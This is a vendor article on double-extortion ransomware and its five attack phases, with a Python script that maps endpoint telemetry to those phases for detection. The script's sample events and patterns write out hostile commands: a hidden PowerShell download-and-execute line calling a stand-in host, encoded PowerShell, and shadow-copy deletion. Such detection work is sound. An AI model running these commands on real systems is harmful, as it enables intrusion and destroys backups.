Of all the cyber threats currently facing Australian businesses, one of the most feared is ransomware. By introducing malware into an IT infrastructure, criminals can lock down data stores and then demand significant payments in exchange for the decryption keys.
Unfortunately, many organisations opt to pay the demanded ransom to regain access to their data. This, in turn, has made ransomware a very attractive vehicle for criminals looking to generate as much money from their activities as possible.
Now, growing numbers of attackers are using an additional tactic to ensure their victims pay. It is a method that has been dubbed ‘double extortion’.
Under the double extortion model, ransomware attackers still encrypt data and demand a ransom to regain access. However, they also go a step further: they copy data out of the network before encrypting it, and threaten to publish that exfiltrated data online if their terms are not met.
This approach has proven successful for a number of reasons. Firstly, businesses already fear ransomware and the operational impact it can have. Secondly, even if an afflicted business ultimately rids itself of the ransomware and recovers without paying, the stolen data remains in the attackers’ hands, and the lingering public perception that it paid the ransom, or that its data may yet be leaked, adds further negative sentiment.
Clearly ransomware groups have realised that the damage caused by ransomware extends far beyond the locking of systems. After all, even the knowledge that an attacker is in the network, combined with the threat that encryption could be triggered at any moment, is enough to make some companies pay out.
Ransomware groups are additionally diversifying their approach by taking copies of data before performing the encryption. This gives them a number of options, each of which has been seen played out in the wild.
Firstly, it proves to the victim and the wider world that they really have breached the organisation. Secondly, it adds another layer of extortion through the threat to leak the data. What is particularly threatening about this approach is that, even if a company restores from backup rather than paying up, the stolen data is still valuable to the attacker, so the threat of leakage is not diminished at all.
In cases where a company does pay the ransom, the cybercriminals may assure it that they have deleted their copy of the data, but such assurances are worthless: the victim has no way to verify deletion, and the data could still be leaked later on, or used to leverage yet another payout.
Thankfully, there are a number of ways in which ransomware attacks can be prevented, or at least mitigated. These methods also reduce the threat by minimising the time intruders spend inside the corporate network before they are found.
Minimising an attacker’s time inside a company network relies upon the security team understanding how ransomware attacks unfold. There are five distinct stages that define a ransomware attack, and by being familiar with each phase, security teams can recognise an intrusion early and respond quickly.
The five phases of a ransomware attack are exploitation and infection, delivery and execution, backup spoliation, file encryption, and user notification and clean-up. To match these steps, there are also five phases of defence against ransomware. These phases are preparation, detection, containment, eradication, and recovery.
An organisation’s ability to recognise the five phases of attack, and then to employ the five phases of defence, rests on effective monitoring of company networks. It is crucial that organisations recognise the stark nature of the ransomware threat and provide the necessary technological solutions and security teams to ensure this comprehensive monitoring.
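As an added example (not the article’s or LogRhythm’s own code), the following Python maps constructed endpoint telemetry onto the five attack phases named above, so that a responder can see which phase an intrusion has reached and how quickly it is moving. The indicators used (an Office process spawning a script host, encoded PowerShell, shadow-copy and recovery-setting deletion, a burst of file renames to one new extension by a single process, and a ransom-note file being written) are commonly reported ransomware behaviours, but they are assumptions made for this example rather than rules taken from the article; the event field names, the sample events and the rename threshold are likewise illustrative.

```python
"""Map endpoint telemetry to the five ransomware attack phases.

Added example, not the article's or LogRhythm's code. The phase names come
from the article; every indicator below is an illustrative assumption drawn
from commonly reported ransomware tradecraft, not a complete rule set.
Events are assumed to be Sysmon-style dicts: process-creation records carry
'parent', 'image' and 'cmdline'; file records carry 'op', 'image', 'path'
and, for renames, 'new_path'. All carry a numeric 'ts' and a 'kind'.
"""
import re
from collections import Counter

PHASES = [
    "exploitation and infection",
    "delivery and execution",
    "backup spoliation",
    "file encryption",
    "user notification and clean-up",
]

OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_PS = re.compile(r"-(e|enc|encodedcommand)\b", re.I)
BACKUP_SPOLIATION = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I),
]
# Illustrative ransom-note name pattern; a production rule would also require
# the same note to appear across many directories to avoid benign README hits.
RANSOM_NOTE = re.compile(r"^(readme|restore|decrypt|how_to)[^\\/]*\.(txt|html|hta)$", re.I)


def _ext(path):
    return path.rsplit(".", 1)[-1].lower()


def classify_process(ev):
    """Return the attack phase a single process-creation event evidences, or None."""
    parent, image, cmd = ev.get("parent", "").lower(), ev.get("image", "").lower(), ev.get("cmdline", "")
    if parent in OFFICE and image in SCRIPT_HOSTS:
        return PHASES[0]          # document macro spawning a script host
    if image == "powershell.exe" and ENCODED_PS.search(cmd):
        return PHASES[1]          # encoded loader pulling down/executing the payload
    if any(p.search(cmd) for p in BACKUP_SPOLIATION):
        return PHASES[2]          # destroying shadow copies / recovery options
    return None


def classify_file(ev):
    """Return the attack phase a single file event evidences, or None."""
    name = ev["path"].rsplit("\\", 1)[-1]
    if ev.get("op") == "create" and RANSOM_NOTE.match(name):
        return PHASES[4]          # ransom note dropped once encryption is done
    return None


def encryption_bursts(events, threshold=20):
    """{(image, new_extension): count} for processes that renamed at least
    `threshold` files to the same new extension, the signature of mass encryption."""
    renames = Counter()
    for ev in events:
        if ev.get("kind") == "file" and ev.get("op") == "rename":
            renames[(ev["image"].lower(), _ext(ev["new_path"]))] += 1
    return {k: v for k, v in renames.items() if v >= threshold}


def phase_timeline(events, threshold=20):
    """Map each observed phase to the earliest timestamp at which it was seen,
    ordered by time, so a responder can tell how far the attack has progressed."""
    seen = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        phase = classify_process(ev) if ev["kind"] == "process" else classify_file(ev)
        if phase and phase not in seen:
            seen[phase] = ev["ts"]
    bursts = encryption_bursts(events, threshold)
    if bursts:
        seen[PHASES[3]] = min(ev["ts"] for ev in events
                              if ev["kind"] == "file" and ev.get("op") == "rename"
                              and (ev["image"].lower(), _ext(ev["new_path"])) in bursts)
    return dict(sorted(seen.items(), key=lambda kv: kv[1]))


# Constructed sample telemetry (not real logs) covering all five phases.
SAMPLE_EVENTS = [
    {"ts": 1, "kind": "process", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')"},
    {"ts": 2, "kind": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": 3, "kind": "process", "parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
] + [
    {"ts": 10 + i, "kind": "file", "op": "rename", "image": "svc_update.exe",
     "path": rf"C:\Share\finance\doc{i}.xlsx", "new_path": rf"C:\Share\finance\doc{i}.xlsx.locked"}
    for i in range(25)
] + [
    {"ts": 40, "kind": "file", "op": "create", "image": "svc_update.exe",
     "path": r"C:\Share\finance\README_RESTORE_FILES.txt"},
]

if __name__ == "__main__":
    for phase, ts in phase_timeline(SAMPLE_EVENTS).items():
        print(f"t={ts:>3}  {phase}")
```

Run against the constructed events, `phase_timeline` reports all five phases in order, with encryption starting at t=10 and the note at t=40; raising the rename threshold above the burst size (e.g. 30) drops the encryption phase, which shows why the threshold must be tuned to the backup and file-server churn of the environment being monitored. The practical point for the defence phases in the article is that a detection firing at phase two or three, before the rename burst begins, leaves the containment window that pure encryption alerting does not.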
The threat of ransomware is unlikely to disappear anytime soon, and the methods being used by cybercriminals continue to become more sophisticated.
For this reason, now is the time to put in place effective protection methods and educate all staff about the threat and the steps they can take to improve security.
Joanne Wong is the vice president, international marketing (APAC and EMEA) at LogRhythm.